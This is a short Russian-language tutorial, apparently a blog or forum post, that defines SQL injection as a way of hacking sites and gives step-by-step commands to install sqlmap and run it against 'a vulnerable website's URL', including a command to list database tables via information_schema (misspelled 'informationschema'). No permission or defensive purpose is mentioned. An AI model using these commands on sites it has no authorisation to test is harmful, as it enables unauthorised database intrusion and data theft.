SQL-инъекция - один из распространённых способов взлома сайтов, работающих с базами данных, основанный на внедрении в запрос произвольного SQL-кода.
1. Обновляем пакеты
$ apt update -y && apt upgrade -y
2. Устанавливаем git и python2
$ apt install python2 git -y
3. Клонируем репозиторий
$ git clone https://github.com/sqlmapproject/sqlmap.git
4. Переходим в директорию
$ cd sqlmap
5. Запускаем
$ python2 sqlmap.py -u <url уязвимого веб-сайта>
Более подробно про все виды атак вы можете почитать на странице github (https://github.com/sqlmapproject/sqlmap.git), их там очень много. Но самый интересный, как по мне, informationschema, ибо он позволяет посмотреть все таблицы в БД.
$ python2 sqlmap.py -u <url уязвимого веб-сайта> -D informationschema --tables
